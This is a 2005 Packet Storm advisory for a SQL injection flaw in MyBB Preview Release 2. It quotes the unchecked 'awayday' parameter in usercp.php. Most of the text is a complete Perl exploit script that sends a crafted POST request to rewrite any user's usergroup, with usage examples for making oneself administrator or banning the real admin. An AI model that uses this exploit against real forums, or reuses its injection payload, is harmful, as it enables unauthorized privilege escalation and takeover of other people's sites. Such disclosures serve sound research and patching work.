mybbpr2.pl.txt

2005-10-27T00:00:00
ID PACKETSTORM:41001
Type packetstorm
Reporter cOre
Modified 2005-10-27T00:00:00

Description

                                        
                                            `Vendor: www.mybboard.com  
Version: 1.00 Preview Release 2, RC4 and mayb prior.  
Script: usercp.php  
Code:  
> if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] !=   
> "no")  
> {  
> [...]  
> $returndate =   
> $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];  
> [...]  
> $newprofile = array(  
> "website" =>   
> addslashes(htmlspecialchars($mybb->input['website'])),  
> "icq" => intval($mybb->input['icq']),  
> "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),  
> "yahoo" =>   
> addslashes(htmlspecialchars($mybb->input['yahoo'])),  
> "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),  
> "birthday" => $bday,  
> "away" => $away,  
> "awaydate" => $awaydate,  
> "returndate" => $returndate, // <--- not checked (bday   
> too, but anyway)  
> "awayreason" =>   
> addslashes(htmlspecialchars($mybb->input['awayreason']))  
> );  
> [...]  
> $db->update_query(TABLE_PREFIX."users", $newprofile,   
> "uid='".$mybb->user['uid']."'");  
So: Attacker can replace "awayday" param by some SQL code and change any   
field in _users table.  
Changing "usergroup" for his "uid" to 4 makes him an admin. To use   
this bug attacker have to be  
a registered/awayting_activation user.  
  
Proof of concept: (For PR2 only)  
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--  
#!/usr/bin/perl  
  
### MyBB Preview Release 2 SQL-Injection PoC ExPlOiT ###  
### ------------------------------------------------ ###  
### To use this you have to be registered member on ###  
### a target. ###  
### ------------------------------------------------ ###  
### Glossary: ###  
### [MYBBUSER] - name of the field in cookie; ###  
### [YOUR_ID] - your uid :) ###  
### [ID] - victim uid ###  
### Available groups: ###  
### 1 - Unregistered / Not Logged In ###  
### 2 - Registered ###  
### 3 - Super Moderators ###  
### 4 - Administrators ###  
### 5 - Awayting Activation ###  
### 6 - Moderators ###  
### 7 - Banned ###  
### ------------------------------------------------ ###  
### Examples: ###  
### 1) TROUBLE --> U need an admin privileges. ###  
### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ###  
### [YOUR_ID] -g 4 server /mybb/ ###  
### 2) TROUBLE --> U need to ban real admin. ###  
### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ###  
### [ID] -g 7 server /mybb/ ###  
  
use IO::Socket;  
  
$tmp=0;  
  
while($tmp<@ARGV)  
{  
if($ARGV[$tmp] eq "-u")  
{  
$mbuser=$ARGV[$tmp+1];  
$tmp++;  
}  
if($ARGV[$tmp] eq "-i")  
{  
$id=$ARGV[$tmp+1];  
$tmp++;  
}  
if($ARGV[$tmp] eq "-g")  
{  
$ugr=$ARGV[$tmp+1];  
$tmp++;  
}  
if($ARGV[$tmp] eq "-h")  
{  
&f_help();  
}  
$tmp++;  
}  
  
$target=$ARGV[@ARGV-2];  
$path =$ARGV[@ARGV-1];  
  
if(!$mbuser || !$id || !$ugr)  
{  
&f_die("Some options aren't specified");  
}  
print "\r\n Attacking http://$target\r\n";  
  
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target",   
PeerPort => "80") || &f_die("Can't connect to $target");  
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";  
  
print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept:   
*/*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type:  
application/x-www-form-urlencoded\nContent-Length:   
".length($str)."\n\n$str\n";  
while(<$sock>)  
{  
if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n   
Just check it.\r\n"; exit(0)}  
}  
print "\r\n Looks like exploit failed :[\r\n";  
  
#----------------------------------#  
# S u B r O u T i N e #  
#----------------------------------#  
  
  
sub f_help()  
{  
print q(  
Usage: mybbpr2.pl <OPTIONS> SERVER PATH  
Options:  
-u USERKEY mybbuser field from cookie.  
-i UID User's uid. (Change group 4 this user)  
-g GROUP New usergroup. (1-7)  
-h Displays this help.  
);  
exit(-1);  
}  
#'  
sub f_die($)  
{  
print "\r\nERROR: $_[0]\r\n";  
exit(-1);  
}  
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--  
  
Found: 1-3 sept 2005. Don't remember.  
Updated package is available (i hope).  
  
ByE.  
`